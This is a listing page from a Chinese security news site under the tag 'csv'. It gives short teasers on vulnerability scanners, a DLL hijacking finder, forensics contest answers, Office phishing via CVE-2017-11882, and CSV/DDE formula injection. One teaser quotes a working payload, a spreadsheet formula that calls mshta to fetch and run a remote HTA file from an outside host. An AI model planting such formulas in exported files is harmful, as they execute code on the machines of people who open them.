csv - 第 6 | CN-SEC 中文网

安全工具

【scan4all】一款拥有15000+POC漏洞扫描工具

0x01 免责声明请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失，均由使用者本人负责。本文...

09月12日678 views评论

阅读全文

安全工具

【红队】一款跨平台社区网页指纹识别工具

工具介绍一款跨平台社区网页指纹识别工具，类似glass、eholo,不同的是该工具调用 nuclei ，可以同时进行漏洞验证。工具使用用法：observer_ward [-t <目标>]...

07月25日108 views评论

阅读全文

取证分析

首届“盘古石杯”全国电子数据取证大赛总决赛-数据分析

数据分析1.分析技术人员电脑内银行卡交易流水，给出转入的对手交易卡号有多少？[答案格式:10][★★☆☆☆]99解压财务流水.rar，得到一堆csv.copy *.csv Merg...

06月25日59 views评论

阅读全文

安全工具

Spartacus：一款功能强大的DLL劫持发现工具

关于Spartacus Spartacus是一款功能强大的DLL劫持发现工具，当一个易受DLL劫持攻击的进程请求加载DLL时，就有可能发生DLL劫持攻击。在该工具的帮助下，广大安...

06月18日54 views评论

阅读全文

安全工具

sandfly-entropyscan：一款功能强大的恶意程序熵扫描工具

关于sandfly-entropyscan sandfly-entropyscan是一款功能强大的熵扫描工具，该工具可以用于检测与恶意软件相关的打包文件或加密二进制文件。除此之外，该工具还支持...

06月15日25 views评论

阅读全文

安全闲碎

利用chatgpt辅助处理html数据原创

使用chatgpt进行辅助编程首先要清晰描述自己需求，生成代码通过不断调试及优化，最终完成任务。有它，对程序员是好事也是坏事。一、确认功能请编程实现以下功能：1.所有html保存在all...

05月30日23 views评论

阅读全文

安全工具

信息收集工具 whichAlive

=================================== 免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，...

05月21日67 views评论

阅读全文

安全文章

社工钓鱼之Office钓鱼(下)

CVE-2017-11882影响范围MicrosoftOffice 2000 MicrosoftOffice 2003 MicrosoftOffice 2007 Service P...

05月15日44 views评论

阅读全文

安全文章

关于微信csv导出漏洞

先看图网传payload：=mshta|'http:\ceye.io1.hta'!A0图片说的用户名改成以上payload，测试了一下是可以改的，但是长度有限制，下图多加了1个字符就是极限了，实战中基...

05月15日60 views评论

阅读全文

安全文章

DDE注入（CSV）漏洞原理及实战案例全汇总

在渗透中遇到导出功能时，会如何进行测试？任意文件下载？或者越权查看？很多人很容易忽略的是DDE注入：导出格式为csv，xls时，或许你可以尝试构造这个漏洞，它不会对网站本身产生危害，但会对终端用户造成...

05月15日103 views已关闭评论

阅读全文

安全百科

CSV注入

CSV 介绍CSV 是“Comma-Separated Values”的缩写，是一种常见的数据格式。CSV 文件通常包含一系列以逗号分隔的值，每个值都表示数据的一个字段。这种数据格式常用于将数据从一个...

04月22日62 views评论

阅读全文

安全文章

CSV注入之RCE&社工钓鱼

漏洞介绍CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量，攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷，当用户打开Excel文件时，文件会从CSV...

04月02日122 views评论

阅读全文

在线咨询

微信